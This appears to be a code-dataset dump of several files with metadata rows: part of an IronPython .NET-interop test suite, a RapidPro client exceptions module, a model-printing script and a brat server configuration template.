self.assertEqual(repr(dict), "Dictionary[object, object]()")
dict["abc"] = "def"
self.assertEqual(repr(dict), "Dictionary[object, object]({'abc' : 'def'})")
dict["two"] = "def"
self.assertTrue(repr(dict) == "Dictionary[object, object]({'abc' : 'def', 'two' : 'def'})" or
repr(dict) == "Dictionary[object, object]({'two' : 'def', 'abc' : 'def'})")
dict = System.Collections.Generic.Dictionary[object, object]()
dict['abc'] = dict
self.assertEqual(repr(dict), "Dictionary[object, object]({'abc' : {...}})")
dict = System.Collections.Generic.Dictionary[object, object]()
dict[dict] = 'abc'
self.assertEqual(repr(dict), "Dictionary[object, object]({{...} : 'abc'})")
def test_issubclass(self):
self.assertTrue(issubclass(int, clr.GetClrType(int)))
def test_explicit_interface_impl(self):
from IronPythonTest import ExplicitTestNoConflict, ExplicitTestOneConflict
noConflict = ExplicitTestNoConflict()
oneConflict = ExplicitTestOneConflict()
self.assertEqual(noConflict.A(), "A")
self.assertEqual(noConflict.B(), "B")
self.assertTrue(hasattr(noConflict, "A"))
self.assertTrue(hasattr(noConflict, "B"))
self.assertRaises(AttributeError, lambda : oneConflict.A())
self.assertEqual(oneConflict.B(), "B")
self.assertTrue(not hasattr(oneConflict, "A"))
self.assertTrue(hasattr(oneConflict, "B"))
def test_interface_isinstance(self):
l = System.Collections.ArrayList()
self.assertEqual(isinstance(l, System.Collections.IList), True)
def test_serialization(self):
"""
TODO:
- this should become a test module in and of itself
- way more to test here..
"""
import pickle
# test the primitive data types...
data = [1, 1.0, 2j, 2, System.Int64(1), System.UInt64(1),
System.UInt32(1), System.Int16(1), System.UInt16(1),
System.Byte(1), System.SByte(1), System.Decimal(1),
System.Char.MaxValue, System.DBNull.Value, System.Single(1.0),
System.DateTime.Now, None, {}, (), [], {'a': 2}, (42, ), [42, ],
System.StringSplitOptions.RemoveEmptyEntries,
]
data.append(list(data)) # list of all the data..
data.append(tuple(data)) # tuple of all the data...
class X:
def __init__(self):
self.abc = 3
class Y(object):
def __init__(self):
self.abc = 3
# instance dictionaries...
data.append(X().__dict__)
data.append(Y().__dict__)
# recursive list
l = []
l.append(l)
data.append(l)
# dict of all the data
d = {}
cnt = 100
for x in data:
d[cnt] = x
cnt += 1
data.append(d)
# recursive dict...
d1 = {}
d2 = {}
d1['abc'] = d2
d1['foo'] = 'baz'
d2['abc'] = d1
data.append(d1)
data.append(d2)
for value in data:
# use cPickle & clr.Serialize/Deserialize directly
for newVal in (pickle.loads(pickle.dumps(value)), clr.Deserialize(*clr.Serialize(value))):
self.assertEqual(type(newVal), type(value))
try:
self.assertEqual(newVal, value)
except RuntimeError as e:
# we hit one of our recursive structures...
self.assertEqual(str(e), "maximum recursion depth exceeded")
self.assertTrue(type(newVal) is list or type(newVal) is dict)
# passing an unknown format raises...
self.assertRaises(ValueError, clr.Deserialize, "unknown", "foo")
al = System.Collections.ArrayList()
al.Add(2)
gl = System.Collections.Generic.List[int]()
gl.Add(2)
# lists...
for value in (al, gl):
for newX in (pickle.loads(pickle.dumps(value)), clr.Deserialize(*clr.Serialize(value))):
self.assertEqual(value.Count, newX.Count)
for i in range(value.Count):
self.assertEqual(value[i], newX[i])
ht = System.Collections.Hashtable()
ht['foo'] = 'bar'
gd = System.Collections.Generic.Dictionary[str, str]()
gd['foo'] = 'bar'
# dictionaries
for value in (ht, gd):
for newX in (pickle.loads(pickle.dumps(value)), clr.Deserialize(*clr.Serialize(value))):
self.assertEqual(value.Count, newX.Count)
for key in value.Keys:
self.assertEqual(value[key], newX[key])
# interesting cases
for tempX in [System.Exception("some message")]:
for newX in (pickle.loads(pickle.dumps(tempX)), clr.Deserialize(*clr.Serialize(tempX))):
self.assertEqual(newX.Message, tempX.Message)
try:
exec(" print 1")
except Exception as err:
tempX = err
newX = pickle.loads(pickle.dumps(tempX))
for attr in ['args', 'filename', 'text', 'lineno', 'msg', 'offset', 'print_file_and_line']:
self.assertEqual(eval("newX.%s" % attr),
eval("tempX.%s" % attr))
class K(System.Exception):
other = "something else"
tempX = K()
#CodePlex 16415
#for newX in (cPickle.loads(cPickle.dumps(tempX)), clr.Deserialize(*clr.Serialize(tempX))):
# self.assertEqual(newX.Message, tempX.Message)
# self.assertEqual(newX.other, tempX.other)
#CodePlex 16415
tempX = System.Exception
#for newX in (cPickle.loads(cPickle.dumps(System.Exception)), clr.Deserialize(*clr.Serialize(System.Exception))):
# temp_except = newX("another message")
# self.assertEqual(temp_except.Message, "another message")
def test_generic_method_error(self):
if is_netcoreapp:
clr.AddReference("System.Linq.Queryable")
else:
clr.AddReference('System.Core')
from System.Linq import Queryable
self.assertRaisesMessage(TypeError, "The type arguments for method 'First' cannot be inferred from the usage. Try specifying the type arguments explicitly.", Queryable.First, [])
def test_collection_length(self):
from IronPythonTest import GenericCollection
a = GenericCollection()
self.assertEqual(len(a), 0)
a.Add(1)
self.assertEqual(len(a), 1)
self.assertTrue(hasattr(a, '__len__'))
def test_dict_copy(self):
self.assertTrue('MaxValue' in System.Int32.__dict__.copy())
def test_decimal_bool(self):
self.assertEqual(bool(System.Decimal(0)), False)
self.assertEqual(bool(System.Decimal(1)), True)
def test_add_str_char(self):
self.assertEqual('bc' + System.Char.Parse('a'), 'bca')
self.assertEqual(System.Char.Parse('a') + 'bc', 'abc')
def test_import_star_enum(self):
d = {}
exec("from System.AttributeTargets import *", d, d)
self.assertTrue('ReturnValue' in d)
def test_cp11971(self):
import os
old_syspath = [x for x in sys.path]
try:
sys.path.append(self.temporary_dir)
#Module using System
self.write_to_file(os.path.join(self.temporary_dir, "cp11971_module.py"),
"""def a():
from System import Array
return Array.CreateInstance(int, 2, 2)""")
#Module which doesn't use System directly
self.write_to_file(os.path.join(self.temporary_dir, "cp11971_caller.py"),
"""import cp11971_module
A = cp11971_module.a()
if not hasattr(A, 'Rank'):
raise Exception('CodePlex 11971')
""")
#Validations
import cp11971_caller
self.assertTrue(hasattr(cp11971_caller.A, 'Rank'))
self.assertTrue(hasattr(cp11971_caller.cp11971_module.a(), 'Rank'))
finally:
sys.path = old_syspath
def test_ienumerable__getiter__(self):
#--empty list
called = 0
x = System.Collections.Generic.List[int]()
self.assertTrue(hasattr(x, "__iter__"))
for stuff in x:
called +=1
self.assertEqual(called, 0)
#--add one element to the list
called = 0
x.Add(1)
for stuff in x:
self.assertEqual(stuff, 1)
called +=1
self.assertEqual(called, 1)
#--one element list before __iter__ is called
called = 0
x = System.Collections.Generic.List[int]()
x.Add(1)
for stuff in x:
self.assertEqual(stuff, 1)
called +=1
self.assertEqual(called, 1)
#--two elements in the list
called = 0
x.Add(2)
for stuff in x:
self.assertEqual(stuff-1, called)
called +=1
self.assertEqual(called, 2)
def test_overload_functions(self):
for x in min.Overloads.Functions:
self.assertTrue(x.__doc__.startswith('min('))
self.assertTrue(x.__doc__.find('CodeContext') == -1)
# multiple accesses should return the same object
self.assertEqual(
id(min.Overloads[object, object]),
id(min.Overloads[object, object])
)
def test_clr_dir(self):
self.assertTrue('IndexOf' not in clr.Dir('abc'))
self.assertTrue('IndexOf' in clr.DirClr('abc'))
def test_array_contains(self):
if is_mono: # for whatever reason this is defined on Mono
System.Array[str].__dict__['__contains__']
else:
self.assertRaises(KeyError, lambda : System.Array[str].__dict__['__contains__'])
def test_a_override_patching(self):
from IronPythonTest import TestHelpers
if is_netcoreapp:
clr.AddReference("System.Dynamic.Runtime")
clr.AddReference("System.Linq.Expressions")
else:
clr.AddReference("System.Core")
# derive from object
class x(object):
pass
# force creation of GetHashCode built-in function
TestHelpers.HashObject(x())
# derive from a type which overrides GetHashCode
from System.Dynamic import InvokeBinder
from System.Dynamic import CallInfo
class y(InvokeBinder):
def GetHashCode(self): return super(InvokeBinder, self).GetHashCode()
# now the super call should work & should include the InvokeBinder new type
TestHelpers.HashObject(y(CallInfo(0)))
def test_inherited_interface_impl(self):
from IronPythonTest import BinderTest
BinderTest.InterfaceTestHelper.Flag = False
BinderTest.InterfaceTestHelper.GetObject().M()
self.assertEqual(BinderTest.InterfaceTestHelper.Flag, True)
BinderTest.InterfaceTestHelper.Flag = False
BinderTest.InterfaceTestHelper.GetObject2().M()
self.assertEqual(BinderTest.InterfaceTestHelper.Flag, True)
def test_dir(self):
# make sure you can do dir on everything in System which
# includes special types like ArgIterator and Func
for attr in dir(System):
dir(getattr(System, attr))
if is_netcoreapp:
clr.AddReference("System.Collections")
for x in [System.Collections.Generic.SortedList,
System.Collections.Generic.Dictionary,
]:
temp = dir(x)
def test_family_or_assembly(self):
from IronPythonTest import FamilyOrAssembly
class my(FamilyOrAssembly): pass
obj = my()
self.assertEqual(obj.Method(), 42)
obj.Property = 'abc'
self.assertEqual(obj.Property, 'abc')
def test_valuetype_iter(self):
from System.Collections.Generic import Dictionary
d = Dictionary[str, str]()
d["a"] = "foo"
d["b"] = "bar"
it = iter(d)
self.assertEqual(it.__next__().Key, 'a')
self.assertEqual(it.__next__().Key, 'b')
@unittest.skipIf(is_mono, "Causes an abort on mono, needs debug")
def test_abstract_class_no_interface_impl(self):
# this can't be defined in C# or VB, it's a class which is
# abstract and therefore doesn't implement the interface method
ilcode = """
// Microsoft (R) .NET Framework IL Disassembler. Version 3.5.30729.1
// Copyright (c) Microsoft Corporation. All rights reserved.
// Metadata version: v2.0.50727
.assembly extern mscorlib
{
.publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
.ver 2:0:0:0
}
.assembly test
{
.custom instance void [mscorlib]System.Runtime.CompilerServices.CompilationRelaxationsAttribute::.ctor(int32) = ( 01 00 08 00 00 00 00 00 )
.custom instance void [mscorlib]System.Runtime.CompilerServices.RuntimeCompatibilityAttribute::.ctor() = ( 01 00 01 00 54 02 16 57 72 61 70 4E 6F 6E 45 78 // ....T..WrapNonEx
63 65 70 74 69 6F 6E 54 68 72 6F 77 73 01 ) // ceptionThrows.
.hash algorithm 0x00008004
.ver 0:0:0:0
}
.module test.dll
// MVID: {EFFA8498-8C81-4168-A911-C25D4A2C633A}
.imagebase 0x00400000
.file alignment 0x00000200
.stackreserve 0x00100000
.subsystem 0x0003 // WINDOWS_CUI
.corflags 0x00000001 // ILONLY
// Image base: 0x00500000
// =============== CLASS MEMBERS DECLARATION ===================
.class interface public abstract auto ansi IFoo
{
.method public hidebysig newslot abstract virtual
instance string Baz() cil managed
{
} // end of method IFoo::Baz
} // end of class IFoo
.class public abstract auto ansi beforefieldinit AbstractILTest
extends [mscorlib]System.Object
implements IFoo
{
.method public hidebysig static string
Helper(class IFoo x) cil managed
{
// Code size 12 (0xc)
.maxstack 1
.locals init (string V_0)
IL_0000: nop
IL_0001: ldarg.0
IL_0002: callvirt instance string IFoo::Baz()
IL_0007: stloc.0
IL_0008: br.s IL_000a
IL_000a: ldloc.0
IL_000b: ret
} // end of method foo::Helper
.method family hidebysig specialname rtspecialname
instance void .ctor() cil managed
{
// Code size 7 (0x7)
.maxstack 8
IL_0000: ldarg.0
IL_0001: call instance void [mscorlib]System.Object::.ctor()
IL_0006: ret
} // end of method foo::.ctor
} // end of class foo
"""
import os
testilcode = os.path.join(self.temporary_dir, 'testilcode_%d.il' % os.getpid())
self.write_to_file(testilcode, ilcode)
try:
self.run_ilasm("/dll " + testilcode)
clr.AddReferenceToFileAndPath(os.path.join(self.temporary_dir, 'testilcode_%d.dll' % os.getpid()))
import AbstractILTest
class x(AbstractILTest):
def Baz(self): return "42"
a = x()
self.assertEqual(AbstractILTest.Helper(a), "42")
finally:
os.unlink(testilcode)
def test_field_assign(self):
"""assign to an instance field through the type"""
from IronPythonTest.BinderTest import KeywordBase
def f():
KeywordBase.SomeField = 42
self.assertRaises(ValueError, f)
def test_event_validates_callable(self):
from IronPythonTest import DelegateTest
def f(): DelegateTest.StaticEvent += 3
self.assertRaisesMessage(TypeError, "event addition expected callable object, got int", f)
def test_struct_assign(self):
from IronPythonTest.BinderTest import ValueTypeWithFields
from System import Array
def noWarnMethod():
arr = Array.CreateInstance(ValueTypeWithFields, 10)
ValueTypeWithFields.X.SetValue(arr[0], 42)
def warnMethod():
arr = Array.CreateInstance(ValueTypeWithFields, 10)
arr[0].X = 42
self.assertNotWarns(RuntimeWarning, noWarnMethod)
self.assertWarns(RuntimeWarning, warnMethod)
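# Note: indexing the array returns a copy of the value type, so "arr[0].X = 42"
# mutates a temporary rather than the stored element; the RuntimeWarning
# asserted above flags exactly that. Going through the FieldInfo helper
# (ValueTypeWithFields.X.SetValue) does not trigger the warning.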
def test_ctor_field_assign_conversions(self):
from IronPythonTest.BinderTest import ValueTypeWithFields
res = ValueTypeWithFields(Y=42)
res.Y = 42
self.assertEqual(ValueTypeWithFields(Y=42), res)
class myint(int): pass
self.assertEqual(ValueTypeWithFields(Y=myint(42)), res)
def test_iterator_dispose(self):
# getting an enumerator from an enumerable should dispose the new enumerator
from IronPythonTest import EnumerableTest, MyEnumerator
box = clr.StrongBox[bool](False)
ietest = EnumerableTest(box)
for x in ietest:
pass
self.assertEqual(box.Value, True)
# enumerating on an enumerator shouldn't dispose the box
box = clr.StrongBox[bool](False)
ietest = MyEnumerator(box)
for x in ietest:
pass
self.assertEqual(box.Value, False)
def test_system_doc(self):
try:
# may or may not get documentation depending on XML files availability
x = System.__doc__
except:
self.fail('test_system_doc')
def test_scope_getvariable(self):
import clr
clr.AddReference('IronPython')
clr.AddReference('Microsoft.Scripting')
from IronPython.Hosting import Python
from Microsoft.Scripting import ScopeVariable
scope = Python.CreateEngine().CreateScope()
var = scope.GetScopeVariable('foo')
self.assertEqual(type(var), ScopeVariable)
def test_weird_compare(self):
from IronPythonTest import WithCompare
self.assertTrue('__cmp__' not in WithCompare.__dict__) # TODO: revisit this once we decide how to map CompareTo to Python
def test_convert_int64_to_float(self):
self.assertEqual(float(System.Int64(42)), 42.0)
self.assertEqual(type(float(System.Int64(42))), float)
def test_cp24004(self):
self.assertTrue("Find" in System.Array.__dict__)
def test_cp23772(self):
a = System.Array
x = a[int]([1, 2, 3])
f = lambda x: x == 2
g = a.Find[int]
self.assertEqual(g.__call__(match=f, array=x), 2)
def test_cp23938(self):
dt = System.DateTime()
x = dt.ToString
y = dt.__getattribute__("ToString")
self.assertEqual(x, y)
z = dt.__getattribute__(*("ToString",))
self.assertEqual(x, z)
self.assertEqual(None.__getattribute__(*("__class__",)),
None.__getattribute__("__class__"))
class Base(object):
def __getattribute__(self, name):
return object.__getattribute__(*(self, name))
class Derived(Base):
def __getattr__(self, name):
if name == "bar":
return 23
raise AttributeError(*(name,))
def __getattribute__(self, name):
return Base.__getattribute__(*(self, name))
a = Derived(*())
self.assertEqual(a.bar, 23)
def test_nothrow_attr_access(self):
self.assertEqual(hasattr('System', 'does_not_exist'), False)
self.assertEqual(hasattr(type, '__all__'), False)
@unittest.skipIf(is_netcoreapp or is_posix, 'No WPF available')
def test_xaml_support(self):
from IronPythonTest import XamlTestObject, InnerXamlTextObject
text = """<custom:XamlTestObject
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
x:Name="TestName"
xmlns:custom="clr-namespace:IronPythonTest;assembly=IronPythonTest" Event="MyEventHandler">
<custom:InnerXamlTextObject x:Name="Foo">
<custom:InnerXamlTextObject x:Name="Bar">
<custom:InnerXamlTextObject2 Name="Baz">
</custom:InnerXamlTextObject2>
</custom:InnerXamlTextObject>
</custom:InnerXamlTextObject>
</custom:XamlTestObject>"""
import os
import wpf
import clr
clr.AddReference('System.Xml')
fname = 'test_%d.xaml' % os.getpid()
self.write_to_file(fname, text)
try:
# easy negative tests
self.assertRaises(TypeError, wpf.LoadComponent, None)
self.assertRaises(TypeError, wpf.LoadComponent, None, fname)
# try it again w/ a passed in module
class MyXamlRootObject(XamlTestObject):
def MyEventHandler(self, arg):
return arg * 2
def inputs():
yield fname
yield System.IO.FileStream(fname, System.IO.FileMode.Open)
yield System.Xml.XmlReader.Create(fname)
yield System.IO.StreamReader(fname)
for inp in inputs():
inst = wpf.LoadComponent(MyXamlRootObject(), inp)
self.assertEqual(inst.Method(42), 84)
self.assertEqual(type(inst.Foo), InnerXamlTextObject)
self.assertEqual(type(inst.Bar), InnerXamlTextObject)
self.assertEqual(inst.Foo.MyName, 'Foo')
self.assertEqual(inst.Baz.Name, 'Baz')
self.assertTrue(inst.Foo is not inst.Bar)
if isinstance(inp, System.IDisposable):
inp.Dispose()
import imp
mod = imp.new_module('foo')
class MyXamlRootObject(XamlTestObject):
pass
for inp in inputs():
# null input
self.assertRaises(TypeError, wpf.LoadComponent, mod, None)
# wrong type of root object
self.assertRaises(Exception, wpf.LoadComponent, mod, inp)
if isinstance(inp, System.IDisposable):
inp.Dispose()
for inp in inputs():
# root object missing event handler
self.assertRaises(System.Xaml.XamlObjectWriterException, wpf.LoadComponent, MyXamlRootObject(), inp)
if isinstance(inp, System.IDisposable):
inp.Dispose()
finally:
os.unlink(fname)
@unittest.skipIf(is_netcoreapp, "TODO: figure out")
def test_extension_methods(self):
import clr, imp, os
if is_netcoreapp:
clr.AddReference('System.Linq')
else:
clr.AddReference('System.Core')
test_cases = [
"""
# add reference via type
import clr
from System.Linq import Enumerable
class TheTestCase(IronPythonTestCase):
def test_reference_via_type(self):
self.assertNotIn('Where', dir([]))
clr.ImportExtensions(Enumerable)
self.assertIn('Where', dir([]))
self.assertEqual(list([2,3,4].Where(lambda x: x == 2)), [2])
""",
"""
# add reference via namespace
import clr
import System
class TheTestCase(IronPythonTestCase):
def test_reference_via_namespace(self):
self.assertNotIn('Where', dir([]))
clr.ImportExtensions(System.Linq)
self.assertIn('Where', dir([]))
self.assertEqual(list([2,3,4].Where(lambda x: x == 2)), [2])
""",
"""
# add reference via namespace, add new namespace w/ more specific type
import clr
import System
from IronPythonTest.ExtensionMethodTest import LinqCollision
class TheTestCase(IronPythonTestCase):
def test_namespace_reference(self):
self.assertNotIn('Where', dir([]))
clr.ImportExtensions(System.Linq)
self.assertIn('Where', dir([]))
self.assertEqual(list([2,3,4].Where(lambda x: x == 2)), [2])
clr.ImportExtensions(LinqCollision)
self.assertEqual([2,3,4].Where(lambda x: x == 2), 42)
""",
"""
import clr
class UserType(object): pass
class UserTypeWithValue(object):
def __init__(self):
self.BaseClass = 200
class UserTypeWithSlots(object):
__slots__ = 'BaseClass'
class UserTypeWithSlotsWithValue(object):
__slots__ = 'BaseClass'
def __init__(self):
self.BaseClass = 100
class TheTestCase(IronPythonTestCase):
def test_user_type(self):
self.assertRaises(AttributeError, lambda : UserType().BaseClass)
self.assertRaises(AttributeError, lambda : UserTypeWithSlots().BaseClass)
self.assertEqual(UserTypeWithValue().BaseClass, 200)
import clr
from IronPythonTest.ExtensionMethodTest import ClassRelationship
clr.ImportExtensions(ClassRelationship)
self.assertEqual(object().BaseClass(), 23)
self.assertEqual([].BaseClass(), 23)
self.assertEqual({}.BaseClass(), 23)
self.assertEqual(UserType().BaseClass(), 23)
# dict takes precedence
x = UserType()
x.BaseClass = 100
self.assertEqual(x.BaseClass, 100)
# slots take precedence
self.assertRaises(AttributeError, lambda : UserTypeWithSlots().BaseClass())
self.assertEqual(UserTypeWithSlotsWithValue().BaseClass, 100)
# dict takes precedence
self.assertEqual(UserTypeWithValue().BaseClass, 200)
""",
"""
import clr
import System
from IronPythonTest.ExtensionMethodTest import ClassRelationship
clr.ImportExtensions(ClassRelationship)
class TheTestCase(IronPythonTestCase):
def test_class_relationship(self):
self.assertEqual([].Interface(), 23)
self.assertEqual([].GenericInterface(), 23)
self.assertEqual([].GenericInterfaceAndMethod(), 23)
self.assertEqual([].GenericMethod(), 23)
self.assertEqual(System.Array[System.Int32]([2,3,4]).Array(), 23)
self.assertEqual(System.Array[int]([2,3,4]).Array(), 23)
self.assertEqual(System.Array[int]([2,3,4]).ArrayAndGenericMethod(), 23)
self.assertEqual(System.Array[int]([2,3,4]).GenericMethod(), 23)
self.assertEqual(object().GenericMethod(), 23)
""",
"""
import clr
import System
from System import Linq
clr.ImportExtensions(Linq)
class Product(object):
def __init__(self, cat, id, qtyOnHand ):
self.Cat = cat
self.ID = id
self.QtyOnHand = qtyOnHand
self.Q = self.QtyOnHand
class TheTestCase(IronPythonTestCase):
def test_extension_method(self):
products = [Product(prod[0], prod[1], prod[2]) for prod in
(('DrillRod', 'DR123', 45), ('Flange', 'F423', 12), ('Gizmo', 'G9872', 214), ('Sprocket', 'S534', 42))]
pd = products.Where(lambda prod: prod.Q < 40).Select(lambda prod: (prod.Cat, prod.ID) )
self.assertEqual(''.join(str(prod) for prod in pd), "('Flange', 'F423')")
# blows: "Type System.Collections.Generic.IEnumerable`1[TSource] contains generic parameters"
pd = products.Where(lambda prod: prod.Q < 40).AsEnumerable().Select(lambda prod: (prod.Cat, prod.ID) )
self.assertEqual(''.join(str(prod) for prod in pd), "('Flange', 'F423')")
pd = products.Where(lambda prod: prod.Q < 40) #ok
self.assertEqual(''.join((str(prod.Cat) + str(prod.ID) + str(prod.Q) for prod in pd)), 'FlangeF42312')
pd2 = pd.Select(lambda prod: (prod.Cat, prod.ID) ) #blows, same exception
self.assertEqual(''.join("Cat: {0}, ID: {1}".format(prod[0], prod[1]) for prod in pd2), "Cat: Flange, ID: F423")
pd2 = products.Select(lambda prod: (prod.Cat, prod.ID) ) #ok
self.assertEqual(''.join("Cat: {0}, ID: {1}".format(prod[0], prod[1]) for prod in pd2), 'Cat: DrillRod, ID: DR123Cat: Flange, ID: F423Cat: Gizmo, ID: G9872Cat: Sprocket, ID: S534')
pd2 = list(pd).Select(lambda prod: (prod.Cat, prod.ID) ) #ok
self.assertEqual(''.join("Cat: {0}, ID: {1}".format(prod[0], prod[1]) for prod in pd2), 'Cat: Flange, ID: F423')
pd = products.Where(lambda prod: prod.Q < 30).ToList() #blows, same exception
self.assertEqual(''.join("Cat: {0}, ID: {1}".format(prod.Cat, prod.ID) for prod in pd), 'Cat: Flange, ID: F423')
pd = list( products.Where(lambda prod: prod.Q < 30) ) #ok
self.assertEqual(''.join("Cat: {0}, ID: {1}".format(prod.Cat, prod.ID) for prod in pd), 'Cat: Flange, ID: F423')
# ok
pd = list( products.Where(lambda prod: prod.Q < 40) ).Select(lambda prod: "Cat: {0}, ID: {1}, Qty: {2}".format(prod.Cat, prod.ID, prod.Q))
self.assertEqual(''.join(prod for prod in pd), 'Cat: Flange, ID: F423, Qty: 12')
# ok
pd = ( list(products.Where(lambda prod: prod.Q < 40))
.Select(lambda prod: "Cat: {0}, ID: {1}, Qty: {2}".format(prod.Cat, prod.ID, prod.Q)) )
self.assertEqual(''.join(prod for prod in pd), 'Cat: Flange, ID: F423, Qty: 12')
"""
]
temp_module = 'temp_module_%d' % os.getpid()
fname = temp_module + '.py'
for test_case in test_cases:
try:
old_path = [x for x in sys.path]
sys.path.append('.')
with open(fname, 'w+') as f:
f.write('''
from test import support
from iptest import IronPythonTestCase
''')
f.write(test_case)
f.write('''
support.run_unittest(TheTestCase)''')
__import__(temp_module)
del sys.modules[temp_module]
finally:
os.unlink(fname)
sys.path = [x for x in old_path]
run_test(__name__)
| 35.835443 | 188 | 0.613098 |
253903cbd5286b07da7db3077a7bbe4830db4edc | 1,754 | py | Python | temba_client/exceptions.py | AfricasVoices/rapidpro-python | 1d5ce00d23a9b28c1f8d70cd18da82f18031b804 | ["BSD-3-Clause"] | 1 | 2021-03-02T03:00:47.000Z | 2021-03-02T03:00:47.000Z | temba_client/exceptions.py | AfricasVoices/rapidpro-python | 1d5ce00d23a9b28c1f8d70cd18da82f18031b804 | ["BSD-3-Clause"] | null | null | null | temba_client/exceptions.py | AfricasVoices/rapidpro-python | 1d5ce00d23a9b28c1f8d70cd18da82f18031b804 | ["BSD-3-Clause"] | null | null | null |
class TembaException(Exception):
def __str__(self):
return self.message
class TembaConnectionError(TembaException):
message = "Unable to connect to host"
class TembaBadRequestError(TembaException):
def __init__(self, errors):
self.errors = errors
def __str__(self):
msgs = []
if isinstance(self.errors, dict):
for field, field_errors in self.errors.items():
if isinstance(field_errors, str): # e.g. {"detail": "message..."}
msgs.append(field_errors)
else:
for error in field_errors: # e.g. {"field1": ["msg1...", "msg2..."]}
msgs.append(error)
elif isinstance(self.errors, list):
msgs = self.errors
return msgs[0] if len(msgs) == 1 else ". ".join(msgs)
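# Illustrative behaviour of the flattening above (hypothetical payloads, not
# taken from a real API response):
#   TembaBadRequestError({"detail": "bad token"})        -> "bad token"
#   TembaBadRequestError({"urns": ["invalid", "dupe"]})  -> "invalid. dupe"
#   TembaBadRequestError(["generic failure"])            -> "generic failure"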
class TembaTokenError(TembaException):
message = "Authentication with provided token failed"
class TembaNoSuchObjectError(TembaException):
message = "No such object exists"
class TembaRateExceededError(TembaException):
message = (
"You have exceeded the number of requests allowed per org in a given time window. "
"Please wait %d seconds before making further requests"
)
def __init__(self, retry_after):
self.retry_after = retry_after
def __str__(self):
return self.message % self.retry_after
class TembaHttpError(TembaException):
def __init__(self, caused_by):
self.caused_by = caused_by
def __str__(self):
return str(self.caused_by)
class TembaSerializationException(TembaException):
pass
class TembaMultipleResultsError(TembaException):
message = "Request for single object returned multiple objects"
| 27.40625 | 91 | 0.649943 |
2f7c83b83136f3ace2e3d0b60b1c6d3709c58797 | 700 | py | Python | scripts/model/cat_model.py | usert5432/vlne | e3cafd30ecce3a2dbc4a37cc4257d07fb1a1785d | ["MIT"] | null | null | null | scripts/model/cat_model.py | usert5432/vlne | e3cafd30ecce3a2dbc4a37cc4257d07fb1a1785d | ["MIT"] | null | null | null | scripts/model/cat_model.py | usert5432/vlne | e3cafd30ecce3a2dbc4a37cc4257d07fb1a1785d | ["MIT"] | null | null | null |
"""Pretty Print training configuration and model structure"""
import argparse
from vlne.utils.io import load_model
def parse_cmdargs():
"""Parse command line arguments"""
parser = argparse.ArgumentParser("Pretty print model")
parser.add_argument(
'outdir',
metavar = 'OUTDIR',
type = str,
help = 'Directory with saved models'
)
return parser.parse_args()
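# Typical invocation (path is hypothetical):
#   python cat_model.py /path/to/saved/models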
def main():
# pylint: disable=missing-function-docstring
cmdargs = parse_cmdargs()
args, model = load_model(cmdargs.outdir, compile = False)
print(args.config.pprint())
#print(model.get_config())
print(model.summary())
if __name__ == '__main__':
main()
| 24.137931 | 61 | 0.658571 |
1797a203d7279891920c0ef3eecb7044567857da | 3,627 | py | Python | config.py | springto/brat | cfc1d0109388cd7d9a5fe3a1e41f20277605dbab | ["CC-BY-3.0"] | null | null | null | config.py | springto/brat | cfc1d0109388cd7d9a5fe3a1e41f20277605dbab | ["CC-BY-3.0"] | null | null | null | config.py | springto/brat | cfc1d0109388cd7d9a5fe3a1e41f20277605dbab | ["CC-BY-3.0"] | null | null | null |
# This configuration was automatically generated by install.sh
from os.path import dirname, join as path_join
# This configuration file specifies the global setup of the brat
# server. It is recommended that you use the installation script
# instead of editing this file directly. To do this, run the following
# command in the brat directory:
#
# ./install.sh
#
# if you wish to configure the server manually, you will first need to
# make sure that this file appears as config.py in the brat server
# root directory. If this file is currently named config_template.py,
# you can do this as follows:
#
# cp config_template.py config.py
#
# you will then need to edit config.py, minimally replacing all
# instances of the string CHANGE_ME with their appropriate values.
# Please note that these values MUST appear in quotes, e.g. as in
#
# ADMIN_CONTACT_EMAIL = 'brat'
# Contact email for users to use if the software encounters errors
ADMIN_CONTACT_EMAIL = 'brat'
# Directories required by the brat server:
#
# BASE_DIR: directory in which the server is installed
# DATA_DIR: directory containing texts and annotations
# WORK_DIR: directory that the server uses for temporary files
#
BASE_DIR = dirname(__file__)
DATA_DIR = path_join(BASE_DIR, 'data')
WORK_DIR = path_join(BASE_DIR, 'work')
# If you have installed brat as suggested in the installation
# instructions, you can set up BASE_DIR, DATA_DIR and WORK_DIR by
# removing the three lines above and deleting the initial '#'
# character from the following four lines:
#from os.path import dirname, join
#BASE_DIR = dirname(__file__)
#DATA_DIR = path_join(BASE_DIR, 'data')
#WORK_DIR = path_join(BASE_DIR, 'work')
# To allow editing, include at least one USERNAME:PASSWORD pair below.
# The format is the following:
#
# 'USERNAME': 'PASSWORD',
#
# For example, user `editor` and password `annotate`:
#
# 'editor': 'annotate',
USER_PASSWORD = {
#'brat': 'brat',
# (add USERNAME:PASSWORD pairs below this line.)
}
########## ADVANCED CONFIGURATION OPTIONS ##########
# The following options control advanced aspects of the brat server
# setup. It is not necessary to edit these in a basic brat server
# installation.
### MAX_SEARCH_RESULT_NUMBER
# It may be a good idea to limit the max number of results to a search
# as very high numbers can be demanding of both server and clients.
# (unlimited if not defined or <= 0)
MAX_SEARCH_RESULT_NUMBER = 1000
### DEBUG
# Set to True to enable additional debug output
DEBUG = False
### LOG_LEVEL
# If you are a developer you may want to turn on extensive server
# logging by enabling LOG_LEVEL = LL_DEBUG
LL_DEBUG, LL_INFO, LL_WARNING, LL_ERROR, LL_CRITICAL = range(5)
LOG_LEVEL = LL_WARNING
#LOG_LEVEL = LL_DEBUG
### BACKUP_DIR
# Define to enable backups
# from os.path import join
#BACKUP_DIR = join(WORK_DIR, 'backup')
try:
assert DATA_DIR != BACKUP_DIR, 'DATA_DIR cannot equal BACKUP_DIR'
except NameError:
pass # BACKUP_DIR most likely not defined
### SVG_CONVERSION_COMMANDS
# If export to formats other than SVG is needed, the server must have
# a software capable of conversion like inkscape set up, and the
# following must be defined.
# (SETUP NOTE: at least Inkscape 0.46 requires the directory
# ".gnome2/" in the apache home directory and will crash if it doesn't
# exist.)
#SVG_CONVERSION_COMMANDS = [
# ('png', 'inkscape --export-area-drawing --without-gui --file=%s --export-png=%s'),
# ('pdf', 'inkscape --export-area-drawing --without-gui --file=%s --export-pdf=%s'),
# ('eps', 'inkscape --export-area-drawing --without-gui --file=%s --export-eps=%s'),
#]
| 39.857143 | 87 | 0.740006 |
